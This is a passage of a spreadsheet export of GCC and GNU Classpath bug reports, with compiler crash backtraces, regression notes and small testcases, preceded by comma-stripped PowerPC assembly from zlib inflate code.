	cmpwi 790
	bne- 7.L226
	lwz 0.LC21-.LCTOC1(30)
	li 11144
	stw 01200(1)
	lwz 0.LC22-.LCTOC1(30)
	stw 91208(1)
	stw 01204(1)
	addi 9116
	li 08
	mtctr 11
.L589:
	stw 00(9)
	addi 994
	bdnz .L589
	li 11112
	mtctr 11
	addi 918
	addi 99584
	li 09
.L588:
	stw 00(9)
	addi 994
	bdnz .L588
	li 1124
	mtctr 11
	li 07
	addi 911040
.L587:
	stw 00(9)
	addi 994
	bdnz .L587
	li 08
	mtctr 0
	addi 911136
.L586:
	stw 00(9)
	addi 994
	bdnz .L586
	lwz 11.LC23-.LCTOC1(30)
	li 07
	addi 28116
	addi 1911168
	lwz 6.LC24-.LCTOC1(30)
	lwz 7.LC25-.LCTOC1(30)
	lwz 8.LC26-.LCTOC1(30)
	mr 911
	stw 00(11)
	mr 328
	li 4288
	li 5257
	mr 1019
	bl huft_build@local
	li 1130
	li 05
	mr 928
	mtctr 11
.L585:
	stw 00(9)
	addi 994
	bdnz .L585
	lwz 11.LC27-.LCTOC1(30)
	lwz 6.LC28-.LCTOC1(30)
	lwz 7.LC29-.LCTOC1(30)
	lwz 8.LC30-.LCTOC1(30)
	mr 911
	stw 00(11)
	mr 328
	mr 1019
	li 430
	li 50
	bl huft_build@local
	lwz 9.LC20-.LCTOC1(30)
	li 01
	stw 00(9)
.L226:
	lwz 9.LC23-.LCTOC1(30)
	lwz 28.LC19-.LCTOC1(30)
	lwz 80(9)
	lwz 9.LC27-.LCTOC1(30)
	mr 38
	lwz 100(9)
	lwz 9.LC26-.LCTOC1(30)
	stw 81232(1)
	lwz 110(9)
	lwz 9.LC30-.LCTOC1(30)
	stw 101236(1)
	lwz 00(9)
	lwz 90(28)
	mr 410
	addi 99-1
	mr 511
	mr 60
	mr 727
	stw 90(28)
	stw 111240(1)
	stw 01244(1)
	bl inflate_codes_new@local
	cmpwi 730
	stw 312(31)
	beq- 7.L631
	li 90
	srwi 25253
	addi 2626-3
	li 06
	stw 98(31)
	b .L610
.L249:
	srwi 25253
	addi 2626-3
	li 03
	b .L609
.L250:
	srwi 25253
	lwz 00(27)
	stw 2536(31)
	lwz 98(27)
	subf 0024
	add 990
	li 09
	stw 00(31)
	lwz 0.LC32-.LCTOC1(30)
	addi 2626-3
	stw 2632(31)
	stw 240(27)
	stw 024(27)
	stw 224(27)
	stw 98(27)
	stw 2352(31)
	mr 331
	mr 427
	li 5-3
	bl inflate_flush@local
	b .L218
.L251:
	cmplwi 72631
.L612:
	bgt- 7.L524
	cmpwi 7220
	beq- 7.L576
	lbz 00(24)
	addi 2222-1
	slw 0026
	addi 26268
	cmplwi 72631
	or 25250
	addi 24241
	li 200
	b .L612
.L524:
	nor 02525
	srwi 9016
	rlwinm 02501631
	cmpw 790
	bne- 7.L558
	neg 09
	rlwinm 0023030
	li 260
	li 250
.L610:
	stw 00(31)
	stw 94(31)
	b .L635
.L260:
	cmpwi 7220
	beq- 7.L576
	cmpwi 7210
	bne- 7.L262
	lwz 1144(31)
	cmpw 72311
	bne+ 7.L590
	lwz 948(31)
	lwz 040(31)
	cmpw 790
	beq- 7.L590
	cmplw 709
	subf 909
	mr 230
	addi 219-1
	blt- 7.L263
	subf 21011
.L263:
	cmpwi 7210
	bne- 7.L262
.L590:
	stw 2352(31)
	mr 520
	mr 331
	mr 427
	bl inflate_flush@local
	lwz 2352(31)
	lwz 1148(31)
	mr 203
	cmplw 72311
	subf 92311
	addi 219-1
	blt- 7.L268
	lwz 044(31)
	subf 21230
.L268:
	lwz 1044(31)
	cmpw 72310
	bne+ 7.L269
	lwz 040(31)
	cmpw 7110
	beq- 7.L269
	cmplw 7011
	subf 9011
	mr 230
	addi 219-1
	blt- 7.L269
	subf 21010
.L269:
	cmpwi 7210
	beq- 7.L576
.L262:
	lwz 284(31)
	li 200
	cmplw 72822
	ble- 7.L273
	mr 2822
.L273:
	cmplw 72821
	ble- 7.L274
	mr 2821
.L274:
	mr 323
	mr 424
	mr 528
	bl memcpy@plt
	lwz 04(31)
	add 242428
	subf 0280
	cmpwi 700
	subf 222822
	add 232328
	subf 212821
	stw 04(31)
	bne- 7.L635
	lwz 928(31)
	addic 99-1
	subfe 999
	rlwinm 9903128
	addi 997
	stw 90(31)
	b .L635
.L278:
	cmplwi 72613
.L613:
	bgt- 7.L526
	cmpwi 7220
	beq- 7.L576
	lbz 00(24)
	addi 2222-1
	slw 0026
	addi 26268
	cmplwi 72613
	or 25250
	addi 24241
	li 200
	b .L613
.L526:
	rlwinm 92502731
	cmplwi 7929
	rlwinm 282501831
	stw 284(31)
	bgt- 7.L285
	rlwinm 028272731
	cmplwi 7029
	ble+ 7.L284
.L285:
	lwz 00(27)
	stw 2536(31)
	lwz 98(27)
	subf 0024
	add 990
	li 09
	stw 00(31)
	lwz 0.LC36-.LCTOC1(30)
	stw 2632(31)
	stw 240(27)
	stw 024(27)
	stw 224(27)
	stw 98(27)
	stw 2352(31)
	mr 331
	mr 427
	li 5-3
	bl inflate_flush@local
	b .L218
.L284:
	add 990
	addi 289258
	cmplwi 72818
	bgt- 7.L286
	li 2819
.L286:
	lwz 032(27)
	lwz 340(27)
	mtctr 0
	mr 428
	li 54
	bctrl
	cmpwi 730
	stw 312(31)
	beq- 7.L631
	li 00
	stw 08(31)
	li 04
	stw 2824(31)
	stw 00(31)
	srwi 252514
	addi 2626-14
.L288:
	lwz 94(31)
	lwz 08(31)
	srwi 9910
	addi 994
	cmplw 709
	bge- 7.L528
	lwz 8.LC37-.LCTOC1(30)
.L296:
	cmplwi 7262
.L614:
	bgt- 7.L530
	cmpwi 7220
	beq- 7.L576
	lbz 00(24)
	addi 2222-1
	slw 0026
	addi 26268
	cmplwi 7262
	or 25250
	addi 24241
	li 200
	b .L614
.L530:
	lwz 118(31)
	lwz 1012(31)
	slwi 0112
	lwzx 980
	rlwinm 02502931
	slwi 992
	stwx 0910
	lwz 94(31)
	addi 11111
	srwi 9910
	addi 994
	cmplw 7119
	stw 118(31)
	srwi 25253
	addi 2626-3
	blt+ 7.L296
.L528:
	lwz 88(31)
	cmplwi 7818
	bgt- 7.L532
	lwz 6.LC37-.LCTOC1(30)
	li 70
.L299:
	addi 1081
	slwi 082
	lwzx 960
	cmplwi 71018
	lwz 1112(31)
	slwi 992
	stwx 7911
	mr 810
	stw 108(31)
	ble+ 7.L299
.L532:
	li 07
	lwz 312(31)
	stw 016(31)
	li 419
	li 519
	li 60
	li 70
	addi 83120
	addi 93116
	mr 1027
	bl huft_build@local
	cmpwi 73-3
	bne+ 7.L300
	lwz 0.LC39-.LCTOC1(30)
	stw 024(27)
	b .L301
.L300:
	cmpwi 73-5
	bne+ 7.L301
	lwz 320(31)
	mr 427
	bl inflate_trees_free@local
	lwz 0.LC41-.LCTOC1(30)
	li 3-3
	stw 024(27)
.L301:
	cmpwi 730
	beq+ 7.L304
	cmpwi 73-3
	mr 203
	bne+ 7.L576
	li 09
	stw 00(31)
	b .L576
.L304:
	li 05
	stw 38(31)
	stw 00(31)
.L636:
	lwz 284(31)
	lwz 118(31)
	rlwinm 92802731
	rlwinm 028272731
	add 990
	addi 99258
	cmplw 7119
	bge- 7.L534
	lwz 2816(31)
	cmplw 72628
.L615:
	bge- 7.L536
	cmpwi 7220
	beq- 7.L576
	lbz 00(24)
	addi 2222-1
	slw 0026
	addi 26268
	cmplw 72628
	or 25250
	addi 24241
	li 200
	b .L615
.L536:
	lwz 11.LC42-.LCTOC1(30)
	slwi 0282
	lwzx 0110
	lwz 920(31)
	and 0250
	slwi 003
	add 990
	lwz 84(9)
	lbz 281(9)
	cmplwi 7815
	bgt- 7.L314
	lwz 98(31)
	lwz 1012(31)
	slwi 1192
	subf 262826
	addi 991
	srw 252528
	stwx 81110
	stw 98(31)
	b .L636
.L314:
	cmpwi 7818
	beq- 7.L316
	addi 108-14
	b .L317
.L316:
	li 107
.L317:
	bne- 7.L318
	li 711
	b .L319
.L318:
	li 73
.L319:
	add 92810
	cmplw 7269
.L616:
	bge- 7.L538
	cmpwi 7220
	beq- 7.L576
	lbz 00(24)
	addi 2222-1
	slw 0026
	addi 26268
	cmplw 7269
	or 25250
	addi 24241
	li 200
	b .L616
.L538:
	slwi 0102
	srw 252528
	subf 262826
	lwzx 0110
	lwz 284(31)
	and 0250
	subf 261026
	srw 252510
	rlwinm 92802731
	rlwinm 1128272731
	lwz 108(31)
	add 770
	add 9911
	addi 99258
	add 0107
	cmplw 709
	bgt- 7.L326
	cmpwi 7816
	subfic 9100
	adde 0910
	mfcr 9
	rlwinm 99311
	and. 1190
	beq+ 0.L325
.L326:
	lwz 00(27)
	stw 2536(31)
	lwz 98(27)
	subf 0024
	add 990
	li 09
	stw 00(31)
	lwz 0.LC44-.LCTOC1(30)
	stw 2632(31)
	stw 240(27)
	stw 024(27)
	stw 224(27)
	stw 98(27)
	stw 2352(31)
	mr 331
	mr 427
	li 5-3
	bl inflate_flush@local
	b .L218
.L325:
	bne- 7.L327
	lwz 012(31)
	slwi 9102
	add 990
	lwz 0-4(9)
	b .L328
.L327:
	li 00
.L328:
	mtctr 7
.L584:
	lwz 1112(31)
	slwi 9102
	stwx 0911
	addi 10101
	bdnz .L584
	stw 108(31)
	b .L636
.L534:
	lwz 320(31)
	mr 427
	bl inflate_trees_free@local
	lwz</t>
  </si>
  <si>
    <t>howie.solomon</t>
  </si>
  <si>
    <t>GCC-10342</t>
  </si>
  <si>
    <t>I know there are errors in this but G++ claims I should submit this because of the internal error.
Thanks!
#include 
#include 
using namespace std
int main()
{
        int iI = 1
        iI++
        switch ( iI )
        {
                case 1:
                        cout &lt;&lt; One &lt;&lt; endl
                break
                case 2:
                        string sFoo
                        cout &lt;&lt; Two &lt;&lt; endl
                        if ( m_bar &gt; 0 )
                        {
                                cout &lt;&lt; dFoo &lt;&lt; endl
                        }
                        return 0
                break
                case 3:
                        cout &lt;&lt; Thress &lt;&lt; endl
                break
        }
        return 0
}
Release:
g++ (GCC) 3.2 (mingw special 20020817-1)
Environment:
Windows 2000
How-To-Repeat:
g++ foo.cpp</t>
  </si>
  <si>
    <t>pdemarco</t>
  </si>
  <si>
    <t>GCC-79456</t>
  </si>
  <si>
    <t>[7 regression] Extra instruction emitted after LRA patch</t>
  </si>
  <si>
    <t>The zvector/vec-cmp-1.c testcase currently fails on s390x.
Starting with that patch we see worse code being generated for:
int __attribute__((noinlinenoclone))
all_eq_double (double __attribute__((vector_size(16))) a
               double __attribute__((vector_size(16))) b)
{
 return __builtin_s390_vec_all_eq (a b)
}
gcc -O3 -march=z13
before:
        vfcedbs %v0%v24%v26
        lhi     %r21
        lochine %r20
        lgfr    %r2%r2
        br      %r14
after:
        vfcedbs %v0%v24%v26
        lhi     %r21
        lr      %r1%r2
        lochine %r10
        lgfr    %r2%r1
        br      %r14
Note: ideally it should be more like:
        vfcedbs %v0%v24%v26
        lghi %r21
        locghine %r20
        br %r14
... but that's a different topic.
The same problem can be reproduced also with vector types:
long foo (long a long b)                                               
{
	return a &gt; b
}
old (r244941):
        cgr     %r2%r3
        lghi    %r21
        locghinh        %r20
        br      %r14
after (r244942):
        cgr     %r2%r3
        lghi    %r11
        locghinh        %r10
        lgr     %r2%r1
        br      %r14</t>
  </si>
  <si>
    <t>GCC-17019</t>
  </si>
  <si>
    <t>THUMB: bad switch statement in md code for addsi3_cbranch_scratch</t>
  </si>
  <si>
    <t>Compiling the following with -O1 for thumb results in bogus code being generated:
    void badness(int a)
    {
        void zorch(int b)
        int b
        for (b = -1 b &lt; a + 1 b++) {
            zorch(b)
        }
    }
In particular it looks like the loop prologue code is screwed up and will cause the loop to always be 
skipped.
Here's how I configured and built the compiler:
$ tar -xjvf gcc-core-3.4.0.tar.bz2
$ cd gcc-3.4.0
$ ./configure --prefix=/usr/local/armdev --target=arm-elf --with-newlib --enable-languages=c
The following lines were uncommented in gcc/config/arm/t-arm-elf:
MULTILIB_OPTIONS    += mno-thumb-interwork/mthumb-interwork
MULTILIB_DIRNAMES   += normal interwork
MULTILIB_EXCEPTIONS += *mapcs-26/*mthumb-interwork*
$ make
$ sudo make install
In case it matters I'm currently using binutils-2.15.
I will try this with 3.4.1 shortly.</t>
  </si>
  <si>
    <t>GCC-9116</t>
  </si>
  <si>
    <t>[3.3 regression] ICE at cp/search.c:282 building complex_io.o on sparcv9-sun-solaris2.8</t>
  </si>
  <si>
    <t xml:space="preserve"> http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit-trail&amp;database=gcc&amp;pr=8017
 I was just wondering what's going on with PR8017.  It's the source of
 bootstrap failures on sparcv9/sparc64 and I verified it continues
 through today with both 3.3 and 3.4.  I also think it's the same
 problem from PR8183 and PR8669.
 Thanks.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-23165</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with -W</t>
  </si>
  <si>
    <t>Take the following simple code:
void foo (void)
{
  if (0)
    a: 
}
compile with -W and we ICE.</t>
  </si>
  <si>
    <t>GCC-70000</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/tree-ssa/pr69666.c (internal compiler error)</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc/objdir/gcc/xgcc -B/home/dave/gnu/gcc/objdi
r/gcc/ /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr69666.c     -fno-d
iagnostics-show-caret -fdiagnostics-color=never   -O2 -w -S -o pr69666.s    (tim
eout = 300)
spawn -ignore SIGHUP /home/dave/gnu/gcc/objdir/gcc/xgcc -B/home/dave/gnu/gcc/obj
dir/gcc/ /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr69666.c -fno-dia
gnostics-show-caret -fdiagnostics-color=never -O2 -w -S -o pr69666.s
/home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr69666.c: In function 'fun
2':
/home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr69666.c:16:1: internal co
mpiler error: Segmentation fault
0x7c5f3b crash_signal
        ../../gcc/gcc/toplev.c:335
0x4b9f18 is_gimple_reg_type
        ../../gcc/gcc/gimple-expr.h:75
0x4b9f18 is_gimple_val(tree_node*)
        ../../gcc/gcc/gimple-expr.c:781
0x7ff82f verify_gimple_assign_unary
        ../../gcc/gcc/tree-cfg.c:3539
0x7ff82f verify_gimple_assign
        ../../gcc/gcc/tree-cfg.c:4333
0x7ff82f verify_gimple_stmt
        ../../gcc/gcc/tree-cfg.c:4590
0x80ff7b verify_gimple_in_cfg(function* bool)
        ../../gcc/gcc/tree-cfg.c:5052
0x6c9c2f execute_function_todo
        ../../gcc/gcc/passes.c:1958
0x6ca4ff do_per_function
        ../../gcc/gcc/passes.c:1645
0x6ca7bb execute_todo
        ../../gcc/gcc/passes.c:2010
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
compiler exited with status 1
output is:
/home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr69666.c: In function 'fun2':
/home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr69666.c:16:1: internal compiler error: Segmentation fault
0x7c5f3b crash_signal
        ../../gcc/gcc/toplev.c:335
0x4b9f18 is_gimple_reg_type
        ../../gcc/gcc/gimple-expr.h:75
0x4b9f18 is_gimple_val(tree_node*)
        ../../gcc/gcc/gimple-expr.c:781
0x7ff82f verify_gimple_assign_unary
        ../../gcc/gcc/tree-cfg.c:3539
0x7ff82f verify_gimple_assign
        ../../gcc/gcc/tree-cfg.c:4333
0x7ff82f verify_gimple_stmt
        ../../gcc/gcc/tree-cfg.c:4590
0x80ff7b verify_gimple_in_cfg(function* bool)
        ../../gcc/gcc/tree-cfg.c:5052
0x6c9c2f execute_function_todo
        ../../gcc/gcc/passes.c:1958
0x6ca4ff do_per_function
        ../../gcc/gcc/passes.c:1645
0x6ca7bb execute_todo
        ../../gcc/gcc/passes.c:2010
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
FAIL: gcc.dg/tree-ssa/pr69666.c (internal compiler error)
FAIL: gcc.dg/tree-ssa/pr69666.c (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-59281</t>
  </si>
  <si>
    <t>attribute((constructor)) accepts enum class as integer constant</t>
  </si>
  <si>
    <t>enum class E : int { prio = 666 }
void f (int) __attribute__((constructor(E::prio)))
is accepted with -std=c++11 whereas the conversion should require an explicit cast. default_conversion -&gt; decay_conversion -&gt; decl_constant_value_safe returns:
 constant 666&gt;
and we then accept any integer_cst.
The example comes from PR 59211.</t>
  </si>
  <si>
    <t>GCC-47615</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: too deep recursion in phi_translate/phi_translate_1 with -ftree-pre -fno-tree-fre -fno-tree-sra</t>
  </si>
  <si>
    <t>Created attachment 23250
auto-reduced testcase
Compiler output:
$ gcc -O -fstrict-aliasing -ftree-pre -fno-tree-fre -fno-tree-sra testcase.C
gcc: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  0x00007ffff643711c in _int_malloc () from /lib/libc.so.6
#1  0x00007ffff64399d0 in malloc () from /lib/libc.so.6
#2  0x00000000011f9c40 in xrealloc (oldmem= size=152) at /mnt/svn/gcc-trunk/libiberty/xmalloc.c:177
#3  0x0000000000bea372 in vec_heap_o_reserve_1 (vec=0x0 reserve= vec_offset= 
    elt_size= exact=) at /mnt/svn/gcc-trunk/gcc/vec.c:321
#4  0x0000000000b1b800 in VEC_vn_reference_op_s_heap_copy (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-sccvn.h:86
#5  phi_translate_1 (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1623
#6  0x0000000000b1bc8c in phi_translate (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1858
#7  phi_translate (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1835
#8  0x0000000000b1b8e9 in phi_translate_1 (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1570
#9  0x0000000000b1bc8c in phi_translate (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1858
#10 phi_translate (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1835
#11 0x0000000000b1b8e9 in phi_translate_1 (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1570
#12 0x0000000000b1bc8c in phi_translate (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1858
#13 phi_translate (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1835
#14 0x0000000000b1b8e9 in phi_translate_1 (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1570
#15 0x0000000000b1bc8c in phi_translate (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1858
#16 phi_translate (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1835
#17 0x0000000000b1b8e9 in phi_translate_1 (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1570
#18 0x0000000000b1bc8c in phi_translate (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1858
#19 phi_translate (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1835
#20 0x0000000000b1b8e9 in phi_translate_1 (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1570
#21 0x0000000000b1bc8c in phi_translate (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1858
#22 phi_translate (expr=0x197c030 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1835
#23 0x0000000000b1b8e9 in phi_translate_1 (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
    at /mnt/svn/gcc-trunk/gcc/tree-ssa-pre.c:1570
#24 0x0000000000b1bc8c in phi_translate (expr=0x197b120 set1=0x197e0c8 set2=0x0 pred=0x7ffff5a484e0 phiblock=0x7ffff5a48548)
Tested revisions:
r169824 - crash
4.5.2 - OK</t>
  </si>
  <si>
    <t>CLASSPATH-24124</t>
  </si>
  <si>
    <t>HttpUrlConnection truncates input stream with gzip content-encoding</t>
  </si>
  <si>
    <t>Fedora Core 4 with libgcj 4.0.0. If the host issues the stream with gzip
encoding  is truncated at seemingly arbitrary points. Simple text content up to
the end point appears to be decompressed successfully but I haven't tested a
huge variety of content. If an Accept-Encoding header is sent that precludes
gzip the stream is completed successfully. I haven't tested a deflate stream.
This is a regression against libgcj 3.4.4.</t>
  </si>
  <si>
    <t>GCC-71185</t>
  </si>
  <si>
    <t>[7 Regression] ice in gimplify_modify_expr at gimplify.c:4873</t>
  </si>
  <si>
    <t>Created attachment 38518
C source code
The attached source code when compiled by gcc trunk dated 20160516
also given compiler flags -c -O3 -march=native does this:
$ ../results/bin/gcc -c -O3 -march=native bug286.c
In function â€˜cubic_stage_fnâ€™:
cc1: internal compiler error: in gimplify_modify_expr at gimplify.c:4873
0x98d609 gimplify_modify_expr
	../../src/trunk/gcc/gimplify.c:4872
0x977b74 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	../../src/trunk/gcc/gimplify.c:10301
0x97a346 gimplify_stmt(tree_node** gimple**)
	../../src/trunk/gcc/gimplify.c:5699
0x97d000 gimplify_and_add(tree_node* gimple**)
	../../src/trunk/gcc/gimplify.c:427
Machine is
model name	: AMD Phenom(tm) II X4 970 Processor</t>
  </si>
  <si>
    <t>GCC-59432</t>
  </si>
  <si>
    <t>[4.9/5 regression] sync/atomic FAILs on 32bit x86 systems without .cfi directives</t>
  </si>
  <si>
    <t>The sync/atomic test recently started to FAIL on Solaris/x86:
Abort
goroutine 1 [chan receive]:
main.main
        /var/gcc/gcc-4.9.0-20131206/10-gcc/i386-pc-solaris2.10/libgo/gotest22695
/test/_testmain.go:67
FAIL: sync/atomic
The Abort happens in the TestNilDeref test:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 3 (LWP 3)]
0xfeb32ddc in sync_atomic.CompareAndSwapInt32 (val=val@entry=0x0 
    old=old@entry=0 new=new@entry=0)
    at /vol/gcc/src/hg/trunk/solaris/libgo/go/sync/atomic/atomic.c:78
78        return __sync_bool_compare_and_swap (val old new)
(gdb) where
#0  0xfeb32ddc in sync_atomic.CompareAndSwapInt32 (val=val@entry=0x0 
    old=old@entry=0 new=new@entry=0)
    at /vol/gcc/src/hg/trunk/solaris/libgo/go/sync/atomic/atomic.c:78
#1  0x0805e902 in atomic_test.$nested16 () at atomic_test.go:1469
#2  0x0805edac in atomic_test.$nested45 () at atomic_test.go:1505
#3  0x0805e8d1 in sync_atomic_test.TestNilDeref (t=0xde625180)
    at atomic_test.go:1500
#4  0xfe976e4a in testing.tRunner (test= 
    t.param=)
    at /vol/gcc/src/hg/trunk/solaris/libgo/go/testing/testing.go:391
#5  testing.$thunk13 (__go_thunk_parameter=0xde200688)
    at /vol/gcc/src/hg/trunk/solaris/libgo/go/testing/testing.go:471
#6  0xfe8d005b in kickoff ()
    at /vol/gcc/src/hg/trunk/solaris/libgo/runtime/proc.c:229
#7  0xfe4a5ba2 in makecontext () from /lib/libc.so.1
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
1: x/i $pc
=&gt; 0xfeb32ddc :
    lock cmpxchg %ecx(%edx)
(gdb) p $ecx
$1 = 0
(gdb) p $edx
$2 = 0
  Rainer</t>
  </si>
  <si>
    <t>GCC-32026</t>
  </si>
  <si>
    <t>[4.3 Regression] misc.c:899: error: 'const struct real_format' has no member named 'log2_b'</t>
  </si>
  <si>
    <t>gcc -c   -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict
-prototypes -Wmissing-prototypes     -fno-common   -DHAVE_CONFIG_H -I. -Iada -I.
./../gcc/gcc -I../../gcc/gcc/ada -I../../gcc/gcc/../include -I../../gcc/gcc/../l
ibcpp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/d
pd -I../libdecnumber    ../../gcc/gcc/ada/decl.c -o ada/decl.o
gcc -c   -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict
-prototypes -Wmissing-prototypes     -fno-common   -DHAVE_CONFIG_H -I. -Iada -I.
./../gcc/gcc -I../../gcc/gcc/ada -I../../gcc/gcc/../include -I../../gcc/gcc/../l
ibcpp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/d
pd -I../libdecnumber    ../../gcc/gcc/ada/misc.c -o ada/misc.o
../../gcc/gcc/ada/misc.c: In function 'enumerate_modes':
../../gcc/gcc/ada/misc.c:899: error: 'const struct real_format' has no member na
med 'log2_b'
2007-05-21  Andreas Krebbel  
        * defaults.h (IBM_FLOAT_FORMAT): Macro definition removed.
        * doc/tm.texi (IBM_FLOAT_FORMAT): Documentation entry removed.
        * real.c (encode_i370_single decode_i370_single
        encode_i370_double decode_i370_double): Functions removed.
        (i370_single_format i370_double_format): Initializations removed.
        (real_maxval round_for_format exact_real_truncate significand_size):
        Consider the log2_b field to always be one.
        (ieee_single_format mips_single_format coldfire_single_format
        ieee_double_format mips_double_format coldfire_double_format
        ieee_extended_motorola_format ieee_extended_intel_96_format
        ieee_extended_intel_128_format ieee_extended_intel_96_round_53_format
        ibm_extended_format mips_extended_format ieee_quad_format
        mips_quad_format vax_f_format vax_d_format vax_g_format
        decimal_single_format decimal_double_format decimal_quad_format
        c4x_single_format c4x_extended_format real_internal_format): Remove
        initialization of log2_b.
        * real.h (i370_single_format i370_double_format): Declarations removed.
        * c-cppbuiltin.c (builtin_define_float_constants): Consider the log2_b
        field to always be one.</t>
  </si>
  <si>
    <t>GCC-31494</t>
  </si>
  <si>
    <t>spurious error: PROCEDURE attribute conflicts with DIMENSION attribute</t>
  </si>
  <si>
    <t>When I compile the module listed below I get the following message:
k.f90:5.13:
    CALL sub2
            1
Error: PROCEDURE attribute conflicts with DIMENSION attribute in 'sub2' at (1)
It resembles Bug 24633. However g95 and Lahey regard 24633 as an error but do not regard this as an error.
MODULE ksbin2_aux_mod
REAL DIMENSION(1) :: sub2
CONTAINS
  SUBROUTINE sub1
    CALL sub2
    CONTAINS 
      SUBROUTINE sub2
      END SUBROUTINE sub2
  END SUBROUTINE sub1
END MODULE ksbin2_aux_mod</t>
  </si>
  <si>
    <t>GCC-6097</t>
  </si>
  <si>
    <t>sparc-sun-solaris2.7 gcc-3.1 RTL checking failure on execute/ieee/fp-cmp-5.c</t>
  </si>
  <si>
    <t>These:
FAIL: gcc.c-torture/execute/ieee/fp-cmp-5.c compilation  -O1
FAIL: gcc.c-torture/execute/ieee/fp-cmp-5.c compilation  -O2
FAIL: gcc.c-torture/execute/ieee/fp-cmp-5.c compilation  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/execute/ieee/fp-cmp-5.c compilation  -O3 -fomit-frame-pointer -funroll-loops
FAIL: gcc.c-torture/execute/ieee/fp-cmp-5.c compilation  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions
FAIL: gcc.c-torture/execute/ieee/fp-cmp-5.c compilation  -O3 -g
FAIL: gcc.c-torture/execute/ieee/fp-cmp-5.c compilation  -Os
are RTL checking failures.  Here's an example:
 &gt; execute/ieee/fp-cmp-5.c: In function `test_isless':
